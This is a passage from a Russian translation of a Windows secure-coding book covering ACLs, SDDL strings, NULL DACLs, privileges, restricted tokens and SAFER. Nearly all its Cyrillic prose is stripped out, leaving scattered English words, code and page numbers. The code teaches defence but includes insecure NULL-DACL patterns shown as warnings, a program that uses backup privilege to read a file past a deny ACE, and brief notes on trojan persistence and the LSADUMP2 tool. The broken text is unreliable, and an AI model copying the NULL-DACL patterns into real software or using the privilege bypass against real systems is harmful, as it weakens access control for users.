SECURITY_ATTRIBUTES sa;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.bInheritHandle = FALSE;
char *szSD = "D:P"
// DACL
"(D;OICI;GA;;;BG)"
// Guests
"(A;OICI;GA;;;SY)"
// SYSTEM
"(A;OICI;GA;;;BA)"
// Admins
"(A;OICI;GRGWGX;;;IU)";// ,
// Interactive
if (ConvertStringSecurityDescriptorToSecurityDescriptor(
szSD,
SDDL_REVISION_1,
&(sa.lpSecurityDescriptor),
NULL)) {
if (!CreateDirectory("C:\\MyDir", &sa )) {
DWORD err = GetLastError();
}
LocalFree(sa.lpSecurityDescriptor);
}
}
( Secureco2\Chapter06.)
, Windows NT 4. SDDL
szSD .
SDDL ACL (. 62).
6-2.
SDDL-
SDDL-
D:P
D , DACL. S:
ACE ( SACL). ACE
. P SE_DACL_PROTECTED,
ACE
.
,
(D;OICI;GA;;;BG)
ACE. ACE
.
D ACE.
161
()
6-2.
SDDL-
OICI . , ACE
(
) ( ),
.
GA Generic All Access, .
BG Guests (Builtin Guests).
ACE
.
ObjectTypeGuid InheritedObjectTypeGuid.
, ACE (
). ACE
A ACE.
(A;OICI;GA;;;SY)
SY SYSTEM ( )
(A;OICI;GA;;;BA)
(A;OICI;GRGWGX;;;IU)
GR , GW , GX .
IU Interactive (,
)
. 62 SDDL.
DACL
D:(D;OICI;GA;;;BG)(A;OICI;GA;;;SY) (A;OICI;GA;;;BA)(A;OICI;GRGWGX;;;IU)
ACE
. 62.
ACE
SDDL
,
. 63 SID Windows 2000
.
Account Operators ( )
AU
Authenticated Users ( )
BA
BG
BO
Backup Operators ( )
BU
CA
CO
DA
Domain Administrators ( )
. . .
162
II
6-3.
()
SDDL-
DG
Domain Guests ( )
DU
Domain Users ( )
IU
Interactive ()
LA
Local Administrator ( )
LG
Local Guest ( )
NU
Network ()
PO
Print Operators ( )
PU
Power Users ( )
RC
Restricted Code ,
CreateRestrictedToken Windows 2000
SO
Server Operators ( )
SU
SY
Local System ( )
WD
World ( , Everyone)
NS
LS
AN
RD
NO
LU
MU
SDDL , SDDL
XML. , SDDL INF
(Security Configuration Editor)
ACL NTFS.
Windows (Windows Security
Push)
, Windows XP Logging Users Monitoring Users.
163
Blake (Read);
Administrators (Full Control);
Guests (Deny: Access).
/*
ATLACL.cpp
*/
#include <atlsecurity.h>
#include <iostream>
using namespace std;
void main(){
try {
// .
CSid sidBlake("Northwindtraders\\blake");
CSid sidAdmin = Sids::Admins();
CSid sidGuests = Sids::Guests();
// ACL ACE!.
// : ACE .
CDacl dacl;
dacl.AddDeniedAce(sidGuests, GENERIC_ALL);
dacl.AddAllowedAce(sidBlake, GENERIC_READ);
dacl.AddAllowedAce(sidAdmin, GENERIC_ALL);
// .
CSecurityDesc sd;
sd.SetDacl(dacl);
CSecurityAttributes sa(sd);
// .
if (CreateDirectory("c:\\MyTestDir", &sa))
cout << " !" << endl;
} catch(CAtlException e) {
cerr << ", ".
<< hex << (HRESULT)e << endl;
}
}
Sids::Admins() Sids::Guests().
SID ,
Administrators Guests, ,
Windows (, , )
. SID
C++, atlsecurity.h.
164
II
, ,
Windows NT 4 Windows 2000. , Windows NT 4,
, , Windows 2000, SDDL
. Secureco2\Chapter06.
, ACL ,
ACL.
ACE-
ACE ACL.
Windows ACE.
,
. ,
ACL , , ACE,
. ACE
ACL:
, (Explicit Deny);
, (Explicit Allow);
, ;
, ;
, ;
, ;
, ;
, . .
ACL ACE,
.
1. GetSecurityInfo GetNamedSecurityInfo,
ACL .
2. ACE EXPLICIT_ACCESS.
3. SetEntriesInAcl, ACL EXPLI
CIT_ACCESS, ACE.
4. SetSecurityInfo SetNamedSecurityInfo,
ACL .
C++, .
, , CreateWellKnownSid (
Windows 2000 SP3, Windows XP Windows .NET Server),
, ATL CSid.
/*
SetUpdatedACL.cpp
*/
#define _WIN32_WINNT 0x0501
#include "windows.h"
#include "aclapi.h"
#include <sddl.h>
165
166
II
NULL,
pNewDacl,
NULL);
} catch(DWORD e) {
//
}
if (sidAuthUsers)
LocalFree(sidAuthUsers);
if (sd)
LocalFree(sd);
if (pNewDacl)
LocalFree(pNewDacl);
return dwErr;
}
AddAccessAllowedAceEx AddAccessAllowedObjectAce ACE
ACL. ACL
.
, AddAccessAllowedACE,
ACL.
AddAccessAllowedACEEx.
SID
Windows SID (Terminal
Server) (Remote Desktop),
, (Win
dows 2000 Server) (Windows XP
). SID ,
, ACL, :
Administrators (Full Control);
Remote Desktop Users (Read) [ (
)];
Interactive Users (Read, Write).
: SID Remote Desktop Users,
.
:
, Madison
. Madison SID
Interactive, ;
Madison ;
167
Windows XP VPN;
Madison
SID Remote Desktop Users.
, ,
, ,
.
, , Madison ,
, .
:
. , Madison
.
, , Madison
, SID
!
, ?
, ACL.
DACL ACE
DACL (NULL DACL)
, .
, NULL DACL = . .
,
, , , ,
, DACL, .
,
, , DACL !
, ,
. .
if (SetSecurityDescriptorDacl(&sd,
TRUE, // DACL...
NULL, // ... !
FALSE)) {
// DACL.
}
SECURITY_DESCRIPTOR. DACL:
SECURITY_DESCRIPTOR sd = {
SECURITY_DESCRIPTOR_REVISION,
0x0,
SE_DACL_PRESENT,
0x0,
0x0,
0x0,
0x0};
// DACL , .. .
168
II
DACL, ATL
Visual Studio .NET.
Windows XP, Secure Windows Initiative Team
Windows Security Penetration Team
DACL, .
,
DACL, :
,
ACL. ,
ACL;
DACL ,
DACL .
,
, ,
!
,
. , ACL ,
.
ACL, .
.
DACL
.
NULL, DACL
, DACL, .
Perl DACL
C++ C ,
Microsoft. DACL,
,
DACL . ,
,
, DACL. :
SetSecurityDescriptorDacl(&sd,
TRUE,
NULL, // DACL
FALSE);
( ) :
SetSecurityDescriptorDacl(&sd,
TRUE,
::malloc(0xFFFFFFFF), // DACL
FALSE);
169
, . malloc
, NULL.
0xFFFFFFFF, 4 294 967 295 , ,
, DACL NULL!
, , , ,
. ,
.
DACL
DACL : (
) Everyone (Deny: Access),
, Windows
. ,
DACL SACL !
! DACL . ,
, .
ACE
ACE : Everyone (WRITE_DAC), Everyone (WRI
TE_OWNER) ACL, .
Everyone (WRITE_DAC)
WRITE_DAC DACL .
ACL,
.
Everyone (WRITE_OWNER)
WRITE_OWNER
. , , .
, ,
.
Everyone (FILE_ADD_FILE)
ACE Everyone (FILE_ADD_FILE) ,
. ,
, .
, ,
, .
Everyone (DELETE)
ACE ,
, ,
.
170
II
Everyone (FILE_DELETE_CHILD)
Windows Delete
subfolders and files ( )
, , .
FILE_DELETE_CHILD ,
.
Everyone (GENERIC_ALL)
GENERIC_ALL, Full Control ( ), ,
NULL DACL. .
, DACL
,
DACL, , , .
:
.
DACL,
.
ACE,
, !
ACL,
:
DACL [Everyone (WRITE_DAC)];
[Everyone (WRITE_OWNER)];
[Everyone (DELETE)].
, ,
:
ACL , .
.NET Framework COM+, IP,
SQL Server. ,
, ACL .
171
,
, .
,
, ( ) .
, ,
.
:
,
, .
, , ,
.
Windows : .NET
Framework COM+. .
.NET Framework
.NET Framework
,
(principal). (
) Windows .
.NET Framework
/ .
,
(
).
. ,
.
.NET Framework
.
(. ): Lippert LaMac
chia, Lange .
.NET Framework Prin
cipalPermission, CLR (Common Language Runtime)
, .
PrincipalPermission ,
,
.
, , .
, .NET Framework
Web Web:
172
II
// .
}
:
WindowsPrincipal principal =
(Thread.CurrentPrincipal as WindowsPrincipal);
if (principal.IsInRole("Administrator")) {
// .
}
: WindowsPrincipal. IsInRole ,
Windows, GenericPrincipal. IsInRole ,
,
.
GenericPrincipal ,
. C#, :
COM+
COM+ Windows,
.
,
. , ,
, , ,
, .
COM+ Component
Services ( ) IsCallerInRole.
, Visual Basic:
.
Dim fAllowed As Boolean
Dim objCallCtx As SecurityCallContext
Set objCallCtx = GetSecurityCallContext()
' .
fAllowed = objCallCtx.IsCallerInRole("Doctor")
If (fAllowed) Then
.
End If
ACL, , ,
,
. ,
.
173
fIsDoctor = objCallCtx.IsCallerInRole("Doctor")
fIsOnDuty = IsCurrentlyOnDuty(szPersonID)
If (fIsDoctor And fIsOnDuty) Then
, ,
.
End If
.
IP-
Web, IIS.
Web, IP (, 192.168.19.23),
(192.168.19.0/24), DNS (www.microsoft.com) (.micro
soft.com). Web
IP,
IP ,
.
accounting.northwindtraders.com,
: IP.
IP ,
. : IP
,
(127.0.0.1).
! Web,
IP, IP
127.0.0.1.
VBScript , IP
Samples Web ,
localhost ( 127.0.0.1).
IP.
Dim oVDir
Dim oIP
Set oVDir = GetObject("IIS://localhost/W3SVC/1/Samples")
Set oIP = oVDir.IPSecurity
' IP! ! 127.0.0.1.
Dim IPList(1)
IPList(1) = "127.0.0.1"
oIP.IPGrant = IPList
' .
oIP.GrantByDefault = False
174
II
' IIS
' .
oVDir.IPSecurity = oIP
oVDir.SetInfo
Set oIP = Nothing
Set oVDir = Nothing
SQL Server
SQL Server
.
, .
: . ,
, . ,
.
SQL Server ACL Windows,
: (
) . :
Blake Accounts (),
, AuditLog (
). SQL Server .
, ACL
. .
,
.
, ,
;
. ,
,
.
.
,
,
.
, .
,
:
: .
:
175
: ;
: ;
: .
:
: ;
: ;
: .
,
Windows SQL Server,
COM+. (:
.) :
ACL. , SQL Server;
, .
. ,
SQL Server.
,
. ,
.
, .
. . 63 IP
Web.
176
II
IP-
Web-
. 63.
IP
, .
, IP,
.
! , ,
, .
. IIS,
( !) Web (
) : I .
! , Web, ,
Web
. , Web
SMB.
, ACL Web
?
!
! :
ACL, SQL Server, IP .
,
, ,
ACL IP,
.
ACL ,
. ACL
.
, 3, ACL
.
:
.
,
. ,
, .
, .
,
. Windows
,
.
. ,
!
(
), ,
, .
,
(
, , ),
. ,
, , ,
. ,
Administrators (),
178
II
.
.
, ,
, ,
. ,
.
, ,
, ,
.
!
,
.
,
, ,
, .
,
.
( , ),
.
(malware).
, , ,
, ,
.
, ,
, ,
. ,
.
(defacement) Web.
,
, .
, ,
.
, , ,
.
179
Back Orifice
,
: , ,
.
Back Orifice Windows
, HKEY_LOCAL_MACHINE\SOFTWARE\Mic
rosoft\Windows\CurrentVersion\Run.
. ,
Back Orifice .
SubSeven
Back Orifice, SubSeven
. SubSeven
Windows, Win.ini System.ini,
HKEY_LOCAL_MACHINE HKEY_CLASSES_ROOT.
. ,
, SubSeven .
FunLove
FunLove, Symantec W32.Funlove.4099,
, W32.Bolzano.
, , ,
. FunLove
Windows NT Ntoskrnl.exe.
FunLove ,
.
ILoveYou
, , , VBS.Lo
veletter The Love Bug. ILoveYou Microsoft
Outlook. : ,
HKEY_LOCAL_MACHINE .
, .
Web-
Web, ,
(script kiddies). Web Internet
Information Services (IIS),
(Internet Printing Protocol, IPP) Microsoft Windows 2000.
, IPP ISAPI
(Internet Server Application Programming Interface),
(SYSTEM).
Microsoft (http://www.micro
soft.com/technet/security/bulletin/MS01023.asp):
180
II
, ISAPI
. ,
,
,
. ,
.
IPP Windows 2000 SYSTEM,
Web .
,
Web.
! ,
,
,
.
, .
! ,
, ,
Windows.
Microsoft Windows NT/2000/
XP Windows .NET Server 2003 :
(Discre
tionary Access Control List, DACL). DACL (
ACL* ) (Access Control Entry, ACE).
ACE (Security ID, SID)
(principal), , ,
, .
, ,
, ACL.
ACL 6.
Windows ,
, (
) , ,
, ,
181
. . ,
(, )
. 71.
7-1.
Windows
( )
#define (Winnt.h)
SeBackupPrivilege (16)
SE_BACKUP_NAME
SeRestorePrivilege (17)
SE_RESTORE_NAME
SE_TCB_NAME
Debug Programs
( )
SeDebugPrivilege (19)
SE_DEBUG_NAME
SeAssignPrimaryToken
Privilege (2)
SE_ASSIGNPRIMARYTOKEN_
NAME
SE_LOAD_DRIVER_NAME
SE_TAKE_OWNERSHIP_NAME
SeTakeOwnershipPrivilege (8)
,
, ,
.
.
,
.
.
SeBackupPrivilege
Backup files and directories
, . , Blake
, , , ACL
.
, CreateFile FILE_FLAG_
BACKUP_SEMANTICS. , .
1. ,
,
.
2. Test.txt .
182
II
3. ACL ACE,
. , Blake, ACE:
Blake (Deny All).
4. .
, , MSDN (http://
msdn.microsoft.com) Platform SDK
/*
WOWAccess.cpp
*/
#include <stdio.h>
#include <windows.h>
int EnablePriv (char *szPriv) {
HANDLE hToken = 0;
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES,
&hToken)) {
printf("OpenProcessToken() !> %d", GetLastError());
return !1;
}
TOKEN_PRIVILEGES newPrivs;
if (!LookupPrivilegeValue (NULL, szPriv,
&newPrivs.Privileges[0].Luid)) {
printf("LookupPrivilegeValue() !>%d",
GetLastError());
CloseHandle (hToken);
return !1;
}
newPrivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
newPrivs.PrivilegeCount = 1;
if (!AdjustTokenPrivileges(hToken, FALSE, &newPrivs , 0,
NULL, NULL)) {
printf("AdjustTokenPrivileges() !>%d",
GetLastError());
CloseHandle (hToken);
return !1;
}
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
printf("AdjustTokenPrivileges() ,
\n");
CloseHandle (hToken);
return 0;
}
183
184
II
Test.txt 0x80.
CreateFile() !> 5
Test.txt 0x2000080 flags
, 15 .
: Hello, Blake!
, CreateFile
( 5), , ,
, FILE_FLAG_BACKUP_SEMANTICS.
SeBackupPrivilege . ,
SeBackupPrivilege SeRestorePrivilege,
. NTBackup.exe,
, ACL,
, .
SeBackupPrivilege .
, :
;
, .
SeRestorePrivilege
,
. , DLL EXE
, ! ,
,
.
SeDebugPrivilege
Debug Programs
,
. ,
. 9.
,
SSL/TLS,
, nCipher (http://www.ncipher.com).
, TerminateProcess
Debug Programs . , ,
, ,
, Lsass.exe,
(Local Security Authority, LSA).
!
, CreateRemote
Thread
.
LSADUMP2 (http://razor.bindview.com/tools):
LSA.
185
Lsass.exe ,
, .
LSA 9.
(Jeffrey Richter) Programming Applications for Microsoft Windows
(Microsoft Press) ( . Windows :
Win32 64 Windows. .:
; .: , 2001).
,
Debug Programs ,
.
. , Blake
, ,
Cheryl.
SeTcbPrivilege
Act as part of the operating system [
Trusted Computing Base (TCB)]
.
Windows.
SYSTEM.
! TCB,
. , , ,
.
TCB
LogonUser,
. , Windows XP, LogonUser
Windows
.
Passport GroupSid NULL.
SeAssignPrimaryTokenPrivilege
SeIncreaseQuotaPrivilege
Replace A Process Level Token Increase Quotas
(spoofing)
.
SeLoadDriverPrivilege
, .
186
II
SeLoadDriverPrivilege,
.
,
.
, (Plug and Play)
Plug and Play.
SeRemoteShutdownPrivilege
.
: ,
. ,
, Everyone ()
! DS (Denial of Service)
!
SeTakeOwnershipPrivilege
Windows NT/2000/XP (owner).
( ),
, .
,
.
, Windows XP ,
,
. Windows XP , Windows
.NET Server 2003,
Administrators (),
.
Windows NT/2000/XP
(token),
. SID , SID
, , .
187
,
. ,
.
(,
) .
Windows 2000,
SID .
(restricted token). ,
.
, ,
SID, ACL
Microsoft Windows NT/2000/XP
, , .
.
, CreateProcessAsUser. , ,
CreateProcessAsUser, SeAssignPri
maryTokenPrivilege SeIncreasQuotaPrivilege. , ,
,
, SeAssignPrimaryTokenPrivilege .
,
(Service Control Manager, SCM).
Local System,
,
SCM (. 71).
. 71.
SCM
LSA.
LSA 9.
188
II
,
,
,
, .
,
, .
SID ,
SID .
ACL, .
, ,
,
. ,
, .
? :
.
, SID .
, .
, ,
SID .
, ,
, ,
. , , ,
, :
, ACL;
, ;
LSA.
,
.
ACL
NTFS ACL:
SYSTEM Full Control ( );
Administrators () Full Control ( );
Everyone () Read ().
,
, (
/
). : 5!
189
: ,
, ,
.
C:\Program Files? : .
,
. ,
.
!
,
. ! Game Over!
GENERIC_ALL
, ACL,
, , . ACL
GENERIC_ALL.
?
SYSTEM. GENERIC_ALL Full Control
( ). ,
. ,
. GENERIC_ALL? , .
GENERIC_READ,
, ACL Read
() Everyone ().
: ,
, ,
( ACE)
.
: Windows NT/2000/XP
, .
, ACL ,
.
,
dwDesiredAccess MAXIMUM_ALLOWED,
, .
,
. :
,
. .
LSA
LSA .
LSA API LsaStorePrivateData LsaRetrievePrivateData.
190
II
, LSA
. Platform SDK LsaStore
PrivateData: , DACL
. , LSA
, ,
.
,
-
( ),
.
ACL
ACL:
;
,
;
ACL .
, ,
. ,
. ,
.
:
, HKEY_LOCAL_MACHINE,
C:\Program Files ( ,
%PROGRAMFILES%) C:\Winnt (%SYSTEMROOT%).
HKEY_CURRENT_USER,
.
:
#include "shlobj.h"
...
TCHAR szPath[MAX_PATH];
...
if (SUCCEEDED(SHGetFolderPath(NULL, CSIDL_PERSONAL NULL, 0, szPath)) {
HANDLE hFile = CreateFile(szPath, ...);
M
}
, ,
,
, .
:
.
191
,
(ACL) ,
. , ,
ACL .
.
,
, , .
, ,
! ,
, .
LSA
Windows 2000/XP API (Data Protection API, DPAPI).
,
,
,
.
DPAPI 9.
6, ACL
ACE. SID .
, SID
.
.
( ),
SID , .
1. , .
2. API, .
3. , .
4. , SID .
5. , SID .
6. .
1: ,
,
: , , , Active Directory,
. ., ,
. , Windows
, ,
. 72.
192
II
7-2.
, -
.
2: ,
API-
,
(. 73).
7-3.
Windows
CreateFile () c
FILE_FLAG_BACKUP_SEMANTICS
SeBackupPrivilege
LogonUser
SeTcbPrivilege ( Windows XP
Windows .NET Server 2003
)
SetTokenInformation
SeTcbPrivilege
ExitWindowsEx
SeShutdownPrivilege
OpenEventLog
SeSecurityPrivilege
BroadcastSystemMessage[Ex]
(BSM_ALLDESKTOPS)
SeTcbPrivilege
SendMessage PostMessage
SeTcbPrivilege
RegisterLogonProcess
SeTcbPrivilege
InitiateSystemShutdown[Ex]
SeShutdownPrivilege
SeRemoteShutdownPrivilege
SetSystemPowerState
SeShutdownPrivilege
GetFileSecurity
SeSecurityPrivilege
7-3.
193
()
,
DebugActiveProcess
ReadProcessMemory
SeDebugPrivilege
CreateProcessAsUser
SeIncreaseQuotaPrivilege
SeAssignPrimaryTokenPrivilege
CreatePrivateObjectSecurityEx
SeSecurityPrivilege
SetSystemTime
SeSystemtimePrivilege
VirtualLock AllocateUserPhysicalPages
SeLockMemoryPrivilege
,
NetUserAdd NetLocalGroupDel
,
Administrators ()
Account Operators ( )
NetJoinDomain
SeMachineAccountPrivilege
, Windows
(wrappers) COM.
, , , ,
Windows.
3: ,
, .
,
.
,
.
.
:
!
4:
, SID ,
.
, RunAs
. ,
:
194
II
( )
, ,
, .
, ,
SYSTEM,
. ,
17:01,
, :
/*
MyToken.cpp
*/
#define SECURITY_WIN32
#include "windows.h"
#include "security.h"
#include "strsafe.h"
#define MAX_NAME 256
//
// . .
LPVOID AllocateTokenInfoBuffer(
HANDLE hToken,
TOKEN_INFORMATION_CLASS InfoClass,
DWORD *dwSize) {
*dwSize=0;
GetTokenInformation(
hToken,
InfoClass,
NULL,
*dwSize, dwSize);
return new BYTE[*dwSize];
}
// () .
void GetUserNames() {
EXTENDED_NAME_FORMAT enf[] = {NameDisplay,
NameSamCompatible,NameUserPrincipal};
for (int i=0; i < sizeof(enf) / sizeof(enf[0]); i++) {
char szName[128];
DWORD cbName = sizeof(szName);
if (GetUserNameEx(enf[i],szName,&cbName))
195
196
II
197
printf("\nSIDS\n");
GetAllSIDs(hToken,TokenGroups);
printf("\nRestricting SIDS\n");
GetAllSIDs(hToken,TokenRestrictedSids);
printf("\nPrivileges\n");
GetPrivs(hToken);
RevertToSelf();
CloseHandle(hToken);
return 0;
}
MyToken.cpp Secureco2\Chapter07
.
, SID, SID .
GetUser, GetAllSIDs GetPrivs.
GetAllSIDs: SID.
( )
.
, , SID
( [DENY]).
,
, OpenProcessToken.
, Token Master
(Jeffrey Richter) (Jason Clark) Programming ServerSide
Applications for Microsoft Windows 2000 (Microsoft Press, 2000) ( ., . .
Microsoft Windows 2000. .:
; .: , 2001)
. Token Master
,
(. 72).
Token Information SID ,
SID .
. , MyToken.cpp
:
User
SIDS
NORTHWINDTRADERS\blake
NORTHWINDTRADERS\Domain Users
\Everyone
BUILTIN\Administrators
BUILTIN\Users
198
II
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\Authenticated Users
Restricting SIDS
None
Privileges
SeChangeNotifyPrivilege (3)
SeSecurityPrivilege (0)
SeBackupPrivilege (0)
SeRestorePrivilege (0)
SeSystemtimePrivilege (0)
SeShutdownPrivilege (0)
SeRemoteShutdownPrivilege (0)
SeTakeOwnershipPrivilege (0)
SeDebugPrivilege (0)
SeSystemEnvironmentPrivilege (0)
SeSystemProfilePrivilege (0)
SeProfileSingleProcessPrivilege (0)
SeIncreaseBasePriorityPrivilege (0)
SeLoadDriverPrivilege (2)
SeCreatePagefilePrivilege (0)
SeIncreaseQuotaPrivilege (0)
SeUndockPrivilege (2)
SeManageVolumePrivilege (0)
. 72. Cmd.exe,
SYSTEM
199
, . 74.
7-4.
SE_PRIVILEGE_USED_FOR_ACCESS
0x80000000
SE_PRIVILEGE_ENABLED_BY_DEFAULT
0x00000001
SE_PRIVILEGE_ENABLED
0x00000002
5:
SID-
: ,
SID ,
, .
, 1 2, 4
. SID ,
, .
SID, Users
() Everyone (), .
.
ACL,
, !
,
, .
.
6:
.
:
,
, ;
(restricted tokens);
.
.
,
. , 95%
, .
200
II
,
, Windows
PrivilegeCheck.
, ,
.
! ,
,
.
, .
. ,
,
. :
.
.
,
.
Web, SYSTEM,
. ,
,
SYSTEM. ,
,
:
;
Windows
;
. ,
!
.
, .
,
. SYSTEM
,
,
SYSTEM. ( , )
RevertToSelf,
, SYSTEM.
, RevertToSelf
201
. , , IIS 5. Web
, , [
(High) (Medium) ].
IWAM_<_>.
IIS [ (Low)
], SYSTEM.
,
,
. , IIS 6
, SYSTEM, ,
SYSTEM Web, .
Windows 2000/XP .
(restricted) ,
CreateRestictedToken.
, ,
. CreateRestictedToken
:
;
SID (restricting SID);
SID (deny
only attribute).
:
. .
SID
,
SID.
,
SID ,
.
SID. ACL
Everyone () , Administrators ()
, . .
, .
Brian, .
:
Everyone ();
Authenticated Users ( );
Administrators ();
Marketing.
202
II
,
()
Everyone.
. Brian
, ,
, SID. (
Administrators, ), .
SID, SID Everyone
, Everyone
.
SID,
, (AND)
SID, .
SID.
SID
(denyonly SID)
.
. ACL Marketing ACE Deny:
Full Controll (: ), SID
Marketing, . ACE
Marketing Allow: Read (: ), SID
Marketing ,
.
, , , . 75
.
7-5.
SID ACL
ACL
Marketing
Allow: Read
ACL
Marketing
Deny: Full Control
SID
Marketing
ACE
SID Marketing
ACE
ACL
ACE-
Marketing
: SID
, SID
. . ACL
Marketing. SID Marketing
, , , ,
203
! SID
.
,
.
,
SID , .
, ,
SID .
Windows 2000/XP .
,
, SID. ,
Authenticated
Users, SID Authenticated Users.
, ,
( ).
,
,
. : (, )
( ).
ShellExecute CreateProcess
, .
-,
CreateProcessAsUser,
.
ImpersonateLoggedOnUser SetThreadToken ,
.
, ,
: , SeChange
NotifyPrivilege ( ).
DISABLE_MAX_PRIVILEGE,
, SID
.
/*
Restrict.cpp
*/
// SID BUILTIN\Administrators.
BYTE sidBuffer[256];
PSID pAdminSID = (PSID)sidBuffer;
SID_IDENTIFIER_AUTHORITY SIDAuth = SECURITY_NT_AUTHORITY;
If (!AllocateAndInitializeSid( &SIDAuth, 2,
SECURITY_BUILTIN_DOMAIN_RID ,
204
II
DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0,
&pAdminSID) ) {
printf("AllocateAndInitializeSid Error %u\n", GetLastError() );
return !1;
}
// SID SID.
SID_AND_ATTRIBUTES SidToDisable[1];
SidToDisable[0].Sid = pAdminSID;
SidToDisable[0].Attributes = 0;
// .
HANDLE hOldToken = NULL;
if (!OpenProcessToken(
GetCurrentProcess(),
TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE |
TOKEN_QUERY | TOKEN_ADJUST_DEFAULT,
&hOldToken)) {
printf("OpenProcessToken (%lu)\n", GetLastError() );
return !1;
}
// .
HANDLE hNewToken = NULL;
if (!CreateRestrictedToken(hOldToken,
DISABLE_MAX_PRIVILEGE,
1, SidToDisable,
0, NULL,
0, NULL,
&hNewToken)) {
printf("CreateRestrictedToken (%lu)\n", GetLastError() );
return !1;
}
if (pAdminSID)
FreeSid(pAdminSID);
//
// .
PROCESS_INFORMATION pi;
STARTUPINFO si;
ZeroMemory(&si, sizeof(STARTUPINFO) );
si.cb = sizeof(STARTUPINFO);
si.lpDesktop = NULL;
// Cmd.exe, ,
// "" Cmd.exe.
char szSysDir[MAX_PATH+1];
if (GetSystemDirectory(szSysDir,MAX_PATH)) {
char szCmd[MAX_PATH+1];
if (StringCchCopy(szCmd,MAX_PATH,szSysDir) == S_OK &&
205
! Restrict.cpp STARTUPINFO.IpDesktop (
NULL) winsta0\\default.
(Terminal Server)
, Terminal Server,
.
Secureco2\Chapter07.
.
( MyToken.cpp),
. , SID Administrators
(denyonly), , SeChangeNotifyPrivilege, .
User
SIDS
NORTHWINDTRADERS\blake
NORTHWINDTRADERS\Domain Users
\Everyone
BUILTIN\Administrators
[DENY]
BUILTIN\Users
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\Authenticated Users
Restricting SIDS
None
206
II
Privileges
SeChangeNotifyPrivilege (3)
, .
.
.
ThreadFunc; ,
Bypass Traverse hecking, DoThreadWork.
#include <windows.h>
DWORD WINAPI ThreadFunc(LPVOID lpParam) {
DWORD dwErr = 0;
try {
if (!ImpersonateSelf(SecurityImpersonation))
throw GetLastError();
HANDLE hToken = NULL;
HANDLE hThread = GetCurrentThread();
if (!OpenThreadToken(hThread,
TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE |
TOKEN_QUERY | TOKEN_IMPERSONATE,
TRUE,
&hToken))
throw GetLastError();
HANDLE hNewToken = NULL;
if (!CreateRestrictedToken(hToken,
DISABLE_MAX_PRIVILEGE,
0, NULL,
0, NULL,
0, NULL,
&hNewToken))
throw GetLastError();
if (!SetThreadToken(&hThread, hNewToken))
throw GetLastError();
// DoThreadWork "" .
DoThreadWork(hNewToken);
} catch(DWORD d) {
dwErr = d;
}
if (dwErr == 0)
RevertToSelf();
return dwErr;
}
207
void main() {
HANDLE h = CreateThread(NULL, 0,
(LPTHREAD_START_ROUTINE)ThreadFunc,
NULL, CREATE_SUSPENDED, NULL);
if (h)
ResumeThread(h);
}
Windows XP
Windows XP Software Restriction
Policies ( ), SAFER,
.
SAFER, .
SAFER
Windows XP, Software Restriction Policies (
).
SAFER ( Winsafer.h),
. SaferCompute
TokenFromLevel. , ,
.
NormalUser, , Administrators
(), Power Users ( ).
Secureco2\Chapter07. MyTo
ken.cpp SID .
/*
SAFER.cpp
*/
#include <windows.h>
#include <WinSafer.h>
#include <winnt.h>
#include <stdio.h>
#include <strsafe.h>
void main() {
SAFER_LEVEL_HANDLE hAuthzLevel;
//
//
//
//
//
//
SAFER_LEVELID_FULLYTRUSTED
SAFER_LEVELID_NORMALUSER
SAFER_LEVELID_CONSTRAINED
SAFER_LEVELID_UNTRUSTED
SAFER_LEVELID_DISALLOWED
SAFER:
( )
()
()
()
()
// .
if (SaferCreateLevel(SAFER_SCOPEID_USER,
SAFER_LEVELID_NORMALUSER,
0, &hAuthzLevel, NULL)) {
208
II
// .
HANDLE hToken = NULL;
if (SaferComputeTokenFromLevel(
hAuthzLevel, // .
NULL,
// NULL.
&hToken,
// .
0,
// .
NULL)) {
// .
// Cmd.exe , ,
// "" Cmd.exe
char szPath[MAX_PATH+1], szSysDir[MAX_PATH+1];
if (GetSystemDirectory(szSysDir, sizeof (szSysDir))) {
StringCbPrintf(szPath,
sizeof (szPath),
"%s\\cmd.exe",
szSysDir);
STARTUPINFO si;
ZeroMemory(&si, sizeof(STARTUPINFO));
si.cb = sizeof(STARTUPINFO);
si.lpDesktop = NULL;
PROCESS_INFORMATION pi;
if (!CreateProcessAsUser(
hToken,
szPath, NULL,
NULL, NULL,
FALSE, CREATE_NEW_CONSOLE,
NULL, NULL,
&si, &pi))
printf("CreateProcessAsUser (%lu)\n",
GetLastError() );
}
}
SaferCloseLevel(hAuthzLevel);
}
}
SAFER
. SAFER,
, ,
.
. ,
,
,
SAFER.
209
Windows Security Push ( Microsoft
, )
Windows .Net Server 2003
. SAFER:
,
. ,
: , .
,
.
.
// RemPriv
#ifndef SE_PRIVILEGE_REMOVED
#define SE_PRIVILEGE_REMOVED (0x00000004)
#endif
DWORD RemovePrivs(LPCTSTR szPrivs[], DWORD cPrivs) {
HANDLE hProcessToken = NULL;
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
&hProcessToken))
return GetLastError();
DWORD cbBuff = sizeof TOKEN_PRIVILEGES +
(sizeof LUID_AND_ATTRIBUTES * cPrivs);
char *pbBuff = new char[cbBuff];
PTOKEN_PRIVILEGES pTokPrivs = (PTOKEN_PRIVILEGES)pbBuff;
// .
pTokPrivs!>PrivilegeCount = cPrivs;
for (DWORD i=0; i < cPrivs; i++) {
LookupPrivilegeValue(NULL,szPrivs[i],
&(pTokPrivs!>Privileges[i].Luid));
pTokPrivs!>Privileges[i].Attributes = SE_PRIVILEGE_REMOVED;
}
// .
BOOL fRet = AdjustTokenPrivileges(hProcessToken,
FALSE,
pTokPrivs,
0,
NULL,
NULL);
DWORD dwErr = GetLastError();
#ifdef _DEBUG
printf("AdjustTokenPrivileges() !> %d\nGetLastError() !> %d\n",
fRet,
210
II
dwErr);
#endif
if (pbBuff) delete [] pbBuff;
CloseHandle(hProcessToken);
return dwErr;
}
int main(int argc, CHAR* argv[]) {
LPCTSTR szPrivs[] = {SE_TAKE_OWNERSHIP_NAME, SE_DEBUG_NAME};
if (RemovePrivs(szPrivs,
sizeof(szPrivs)/sizeof(szPrivs[0])) == 0) {
// ! !
}
}
